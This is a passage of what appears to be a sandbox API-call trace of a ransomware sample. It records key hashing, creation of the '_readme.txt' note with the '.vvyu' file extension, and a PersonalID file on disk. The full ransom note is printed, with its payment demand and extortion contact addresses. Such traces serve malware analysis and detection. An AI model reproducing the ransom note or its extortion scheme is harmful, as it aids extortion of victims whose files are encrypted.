hProv=0x647e98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18ea48 | out: phHash=0x18ea48) returned 1 [0102.802] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0102.802] CryptHashData (hHash=0x2b356f8, pbData=0x2bf6498, dwDataLen=0x1ec, dwFlags=0x0) returned 1 [0102.802] CryptGetHashParam (in: hHash=0x2b356f8, dwParam=0x2, pbData=0x0, pdwDataLen=0x18ea4c, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ea4c) returned 1 [0102.802] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11) returned 0x2b846a8 [0102.802] CryptGetHashParam (in: hHash=0x2b356f8, dwParam=0x2, pbData=0x2b846a8, pdwDataLen=0x18ea4c, dwFlags=0x0 | out: pbData=0x2b846a8, pdwDataLen=0x18ea4c) returned 1 [0102.803] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x34) returned 0x2be0e70 [0102.803] GetLastError () returned 0x0 [0102.803] lstrcatA (in: lpString1="", lpString2="B0" | out: lpString1="B0") returned="B0" [0102.803] GetLastError () returned 0x0 [0102.803] lstrcatA (in: lpString1="B0", lpString2="2C" | out: lpString1="B02C") returned="B02C" [0102.803] GetLastError () returned 0x0 [0102.803] lstrcatA (in: lpString1="B02C", lpString2="80" | out: lpString1="B02C80") returned="B02C80" [0102.803] GetLastError () returned 0x0 [0102.803] lstrcatA (in: lpString1="B02C80", lpString2="DC" | out: lpString1="B02C80DC") returned="B02C80DC" [0102.803] GetLastError () returned 0x0 [0102.803] lstrcatA (in: lpString1="B02C80DC", lpString2="8F" | out: lpString1="B02C80DC8F") returned="B02C80DC8F" [0102.803] GetLastError () returned 0x0 [0102.803] lstrcatA (in: lpString1="B02C80DC8F", lpString2="EB" | out: lpString1="B02C80DC8FEB") returned="B02C80DC8FEB" [0102.803] GetLastError () returned 0x0 [0102.803] lstrcatA (in: lpString1="B02C80DC8FEB", lpString2="F5" | out: lpString1="B02C80DC8FEBF5") returned="B02C80DC8FEBF5" [0102.803] GetLastError () returned 0x0 [0102.803] lstrcatA (in: lpString1="B02C80DC8FEBF5", lpString2="87" | out: lpString1="B02C80DC8FEBF587") returned="B02C80DC8FEBF587" [0102.803] GetLastError () returned 0x0 [0102.803] lstrcatA (in: lpString1="B02C80DC8FEBF587", lpString2="A0" | out: lpString1="B02C80DC8FEBF587A0") returned="B02C80DC8FEBF587A0" [0102.803] GetLastError () returned 0x0 [0102.803] lstrcatA (in: lpString1="B02C80DC8FEBF587A0", lpString2="F6" | out: lpString1="B02C80DC8FEBF587A0F6") returned="B02C80DC8FEBF587A0F6" [0102.804] GetLastError () returned 0x0 [0102.804] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F6", lpString2="2E" | out: lpString1="B02C80DC8FEBF587A0F62E") returned="B02C80DC8FEBF587A0F62E" [0102.804] GetLastError () returned 0x0 [0102.804] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E", lpString2="01" | out: lpString1="B02C80DC8FEBF587A0F62E01") returned="B02C80DC8FEBF587A0F62E01" [0102.804] GetLastError () returned 0x0 [0102.804] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01", lpString2="DA" | out: lpString1="B02C80DC8FEBF587A0F62E01DA") returned="B02C80DC8FEBF587A0F62E01DA" [0102.804] GetLastError () returned 0x0 [0102.804] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01DA", lpString2="DA" | out: lpString1="B02C80DC8FEBF587A0F62E01DADA") returned="B02C80DC8FEBF587A0F62E01DADA" [0102.804] GetLastError () returned 0x0 [0102.804] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01DADA", lpString2="40" | out: lpString1="B02C80DC8FEBF587A0F62E01DADA40") returned="B02C80DC8FEBF587A0F62E01DADA40" [0102.804] GetLastError () returned 0x0 [0102.804] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01DADA40", lpString2="CE" | out: lpString1="B02C80DC8FEBF587A0F62E01DADA40CE") returned="B02C80DC8FEBF587A0F62E01DADA40CE" [0102.804] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b846a8 | out: hHeap=0x5f0000) returned 1 [0102.804] CryptDestroyHash (hHash=0x2b356f8) returned 1 [0102.804] CryptReleaseContext (hProv=0x647e98, dwFlags=0x0) returned 1 [0102.805] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf6498 | out: hHeap=0x5f0000) returned 1 [0102.805] lstrlenA (lpString="B02C80DC8FEBF587A0F62E01DADA40CE") returned 32 [0102.805] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3e0) returned 0x2bf0e48 [0102.805] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5ec) returned 0x2bf0350 [0102.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x2bf0350, cbMultiByte=1516, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 493 [0102.805] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5f0) returned 0x2bf6498 [0102.805] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf0350 | out: hHeap=0x5f0000) returned 1 [0102.806] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf0e48 | out: hHeap=0x5f0000) returned 1 [0102.806] lstrcpyA (in: lpString1=0x62c2b8, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" [0102.806] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf6498 | out: hHeap=0x5f0000) returned 1 [0102.806] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x60) returned 0x2b98b40 [0102.806] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x2b6cce8 [0102.806] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7ab48 [0102.806] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7adb0 [0102.806] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7b018 [0102.806] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7b280 [0102.806] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7b4e8 [0102.807] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7b750 [0102.807] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7b9b8 [0102.807] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7bc20 [0102.807] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7be88 [0102.807] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7c0f0 [0102.807] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x816) returned 0x2bf0350 [0102.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2bf0350, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0102.807] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2bf6498 [0102.807] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf0350 | out: hHeap=0x5f0000) returned 1 [0102.807] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x2b6d018 [0102.807] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7c358 [0102.807] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7c5c0 [0102.807] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7c828 [0102.807] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7ca90 [0102.807] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7ccf8 [0102.807] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7cf60 [0102.807] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7d1c8 [0102.807] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7d430 [0102.808] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7d698 [0102.808] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7d900 [0102.808] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa0) returned 0x2b476d0 [0102.808] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x130) returned 0x68d5c0 [0102.808] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b476d0 | out: hHeap=0x5f0000) returned 1 [0102.808] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1d0) returned 0x2be39c8 [0102.808] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x68d5c0 | out: hHeap=0x5f0000) returned 1 [0102.808] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2b7) returned 0x2be8190 [0102.809] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be39c8 | out: hHeap=0x5f0000) returned 1 [0102.809] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x412) returned 0x2bf0350 [0102.809] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be8190 | out: hHeap=0x5f0000) returned 1 [0102.809] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x61a) returned 0x2bf1570 [0102.810] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf0350 | out: hHeap=0x5f0000) returned 1 [0102.810] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x440) returned 0x2bf0350 [0102.810] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1068) returned 0x2bf1b98 [0102.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2bf0350, cbMultiByte=-1, lpWideCharStr=0x2bf1b98, cchWideChar=2100 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned 1077 [0102.810] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1070) returned 0x2bf2c08 [0102.810] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf1b98 | out: hHeap=0x5f0000) returned 1 [0102.810] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf0350 | out: hHeap=0x5f0000) returned 1 [0102.810] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x2b6d0a8 [0102.811] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bf7f28 [0102.811] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bf8190 [0102.811] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bf83f8 [0102.811] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bf8660 [0102.811] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bf88c8 [0102.811] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bf8b30 [0102.811] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bf8d98 [0102.811] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bf9000 [0102.811] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bf9268 [0102.811] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bf94d0 [0102.811] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x80a) returned 0x2bf0350 [0102.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2bf0350, cchWideChar=1029 | out: lpWideCharStr=".vvyu") returned 6 [0102.811] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x810) returned 0x2bf1b98 [0102.812] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf0350 | out: hHeap=0x5f0000) returned 1 [0102.812] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x2be5ac0 [0102.812] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x2b6ad10 [0102.812] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b845c8 | out: hHeap=0x5f0000) returned 1 [0102.812] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x50) returned 0x2ba7278 [0102.812] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x48) returned 0x2ba78a8 [0102.812] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6ad10 | out: hHeap=0x5f0000) returned 1 [0102.812] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x60) returned 0x2b98ad8 [0102.813] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x60) returned 0x2b98c10 [0102.813] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba78a8 | out: hHeap=0x5f0000) returned 1 [0102.813] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x2b6ba60 [0102.813] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x90) returned 0x6e8fb0 [0102.813] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b98c10 | out: hHeap=0x5f0000) returned 1 [0102.813] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x50) returned 0x2ba7170 [0102.813] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x50) returned 0x2ba72d0 [0102.814] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd8) returned 0x6b3c98 [0102.814] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6e8fb0 | out: hHeap=0x5f0000) returned 1 [0102.814] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x2b6be50 [0102.823] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x2be5ae8 [0102.824] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x50) returned 0x2ba7328 [0102.824] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x138) returned 0x68d5c0 [0102.824] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6b3c98 | out: hHeap=0x5f0000) returned 1 [0102.824] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x60) returned 0x2b98c10 [0102.824] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x2b6be98 [0102.824] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x50) returned 0x2ba7380 [0102.824] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x50) returned 0x2ba73d8 [0102.824] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1c8) returned 0x2be39c8 [0102.825] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x68d5c0 | out: hHeap=0x5f0000) returned 1 [0102.825] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x2b6bee0 [0102.834] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf4e50 | out: hHeap=0x5f0000) returned 1 [0102.835] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5ac0 | out: hHeap=0x5f0000) returned 1 [0102.835] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba7278 | out: hHeap=0x5f0000) returned 1 [0102.835] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b98ad8 | out: hHeap=0x5f0000) returned 1 [0102.835] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6ba60 | out: hHeap=0x5f0000) returned 1 [0102.836] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba7170 | out: hHeap=0x5f0000) returned 1 [0102.836] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba72d0 | out: hHeap=0x5f0000) returned 1 [0102.836] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6be50 | out: hHeap=0x5f0000) returned 1 [0102.837] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5ae8 | out: hHeap=0x5f0000) returned 1 [0102.837] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba7328 | out: hHeap=0x5f0000) returned 1 [0102.837] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b98c10 | out: hHeap=0x5f0000) returned 1 [0102.837] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6be98 | out: hHeap=0x5f0000) returned 1 [0102.838] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba7380 | out: hHeap=0x5f0000) returned 1 [0102.839] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba73d8 | out: hHeap=0x5f0000) returned 1 [0102.839] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6bee0 | out: hHeap=0x5f0000) returned 1 [0102.840] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be39c8 | out: hHeap=0x5f0000) returned 1 [0102.840] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x2b6d0d8 [0102.840] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bf9738 [0102.840] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bf99a0 [0102.840] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bf9c08 [0102.840] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bf9e70 [0102.840] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bfa0d8 [0102.840] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bfa340 [0102.840] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bfa5a8 [0102.840] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bfa810 [0102.840] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bfaa78 [0102.840] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2bface0 [0102.840] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa0) returned 0x2b476d0 [0102.840] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x130) returned 0x68d5c0 [0102.841] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b476d0 | out: hHeap=0x5f0000) returned 1 [0102.841] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1d0) returned 0x2be39c8 [0102.841] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x68d5c0 | out: hHeap=0x5f0000) returned 1 [0102.841] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2b7) returned 0x2be8190 [0102.841] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be39c8 | out: hHeap=0x5f0000) returned 1 [0102.841] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x412) returned 0x2bf23b0 [0102.842] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be8190 | out: hHeap=0x5f0000) returned 1 [0102.842] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x61a) returned 0x2bf0350 [0102.842] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf23b0 | out: hHeap=0x5f0000) returned 1 [0102.842] GetUserNameW (in: lpBuffer=0x18ec50, pcbBuffer=0x18eac4 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x18eac4) returned 1 [0102.843] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x590) returned 0x2bf23b0 [0102.843] GetLastError () returned 0x0 [0102.854] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18e7b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.854] GetLastError () returned 0x3 [0102.854] GetLastError () returned 0x3 [0102.854] CreateDirectoryW (lpPathName="C:\\SystemID" (normalized: "c:\\systemid"), lpSecurityAttributes=0x0) returned 1 [0102.855] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x18e7b8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x540 [0102.856] GetFileType (hFile=0x540) returned 0x1 [0102.856] GetLastError () returned 0x0 [0102.865] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.867] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0102.867] RegisterClassExW (param_1=0x18ea30) returned 0xc1d1 [0102.867] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x9018a [0102.869] 